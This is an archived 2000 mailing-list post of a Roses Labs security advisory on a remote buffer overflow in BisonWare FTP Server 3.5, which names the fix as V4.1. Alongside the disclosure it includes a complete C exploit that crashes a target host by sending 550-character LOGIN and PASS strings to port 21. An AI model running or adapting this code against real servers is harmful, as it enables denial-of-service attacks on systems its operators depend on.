Roses Labs BisonWare FTP Advisory

From: Conde Vampiro (condeat_private)
Date: Sun Mar 05 2000 - 20:17:04 PST

Next message: Derek Callaway: "(fwd) Dump/restore 0.4b15 released"

Previous message: Kris Kennaway: "Re: lynx - someone is deaf and blind ;)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is a multi-part message in MIME format.

------=_NextPart_000_0013_01BF86DF.C624E940
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

"BisonWare is a FTP Server that runs on Windows platform. An intruder can
crash the FTP remotely from outside without the need to log in. Even with no
legitimate account on the system is still possible to attack the FTP
server."

Conde Vampiro
Roses Labs / w00w00
http://www.roses-labs.com
Advanced Security Research.


------=_NextPart_000_0013_01BF86DF.C624E940
Content-Type: text/plain;
	name="RLbison.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="RLbison.txt"


		Roses Labs Security Advisory
                ----------------------------

  Author: Conde Vampiro
  Roses Labs Advisory Code: RLA002
  Date: 2/29/2000.
  Software: BisonWare FTP Server V3.5
  Platform: Windows 9x/NT.=20
  Risk: Remote buffer overflow, that allow
  to crash the FTP Server. (Maybe also be
  possible to execute arbitrary code.)

  ------------
  Introduction
  ------------

	Bison FTP Server is a FTP server that
  runs on windows platforms. An intruder can launch
  an attack that will crash the FTP server.

  ------
  Detail
  ------

	Sending a "LOGIN" & "PASSWORD" of 550 characters
  each, will crash the FTP Server. This is the error that
  the FTP will produce:

  "Exception EAccessViolation in module BISONFTP.EXE at=20
   0A0D4858. Access vilation at address 0A0D5858. Read of=20
   address 0A0D5858."

  ----
  Code=20
  ----

	Warning: Neither the Roses Labs or the author accept
  any responsibility of the use of this code. This code will
  crash the FTP server.

------- CODE START -------

/*
 * FILE: rlxbison.c
 * CODER: Conde Vampiro.
 * DATE: 2/29/2000.
 * ABSTRACT: Remote DoS of BISON FTP Server 3.5
 *
 * Compile: gcc rlxbison.c -o rlbison
 *
 * Roses Labs / w00w00
 * http://www.roses-labs.com
 * Advanced Security Research.
*/

#include <stdio.h>
#include <sys/socket.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <unistd.h>

/* Defines */

#define MAX 551
#define MAXDATA 1024

/* Global variables */

int sock;
int i;
char datacrap[MAX];
char *temp;
char tempdata[MAXDATA];
char buf[MAXDATA];
struct hostent *host;
struct sockaddr_in KillFTP;

/* Prototypes */

unsigned long resolve(char *host_name);
char *crap(int num);

/* Main */

int main(int argc, char *argv[]) {

        if(argc < 2) {
                printf("Usage: %s <Host>\n", argv[0]);
                exit(-1);
        }
        KillFTP.sin_family=3DAF_INET;
        KillFTP.sin_addr.s_addr=3Dresolve(argv[1]);
        if(!KillFTP.sin_addr.s_addr) {
                printf("Host Unkown: %s\n",argv[1]);
                exit(-1);
        }
        KillFTP.sin_port=3Dhtons(21);
        sock=3Dsocket(AF_INET, SOCK_STREAM, 0);
        if(sock < 0) {
                printf("Error creating socket!!\n");
                exit(-1);
        }
        if(!connect(sock,(struct sockaddr *)&KillFTP, sizeof(KillFTP))) =
{
                printf("Roses Labs Bison FTP Xploit\n");
                printf("Remote crashing code!!!\n");
                recv(sock,tempdata,sizeof(tempdata),0);
                sleep(1);
                recv(sock,tempdata,sizeof(tempdata),0);
                temp=3Dcrap(MAX);
                sprintf(buf,"LOGIN %s\n",temp);
                send(sock,buf,strlen(buf),0);
                sprintf(buf,"PASS %s\n",temp);
                send(sock,buf,strlen(buf),0);
                printf("Host %s crashed!!\n",argv[1]);
                exit(0);
        } else {
                printf("Couldn't connect to %s on port 21,\n", argv[1]);
                exit(-1);
        }
        if(close(sock)) {
                printf("Error closing socket!!\n");
                exit(-1);
        }
return(0);
}

/* Functions */

unsigned long resolve(char *host_name) {
        struct in_addr addr;
        struct hostent *host_nam;

        if((addr.s_addr =3D inet_addr(host_name)) =3D=3D -1) {
        if(!(host_nam =3D gethostbyname(host_name))) return(0);
        memcpy((char *) &addr.s_addr, host_nam->h_addr, =
host_nam->h_length);
        }
        return(addr.s_addr);
}

char *crap(int num) {
        for(i=3D0;i<num;i++) {
                datacrap[i]=3D'X';
        }
        return(datacrap);
}

/* w00w00 E0F */

------- CODE END -------

  ---=09
  Fix
  ---

	This problem is fixed in V4.1 out soon.

  ----
  Note=09
  ----

	This bug was found using Cyber Host=20
  Auditor (CHA). CHA is a security tool coded by=20
  The Roses Labs to discover in a easy way DoS &
  possible buffer overflows.

  Roses Labs / w00w00
  http://www.roses-labs.com
  Advanced Security Research.
------=_NextPart_000_0013_01BF86DF.C624E940--

Next message: Derek Callaway: "(fwd) Dump/restore 0.4b15 released"
Previous message: Kris Kennaway: "Re: lynx - someone is deaf and blind ;)"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:39:00 PDT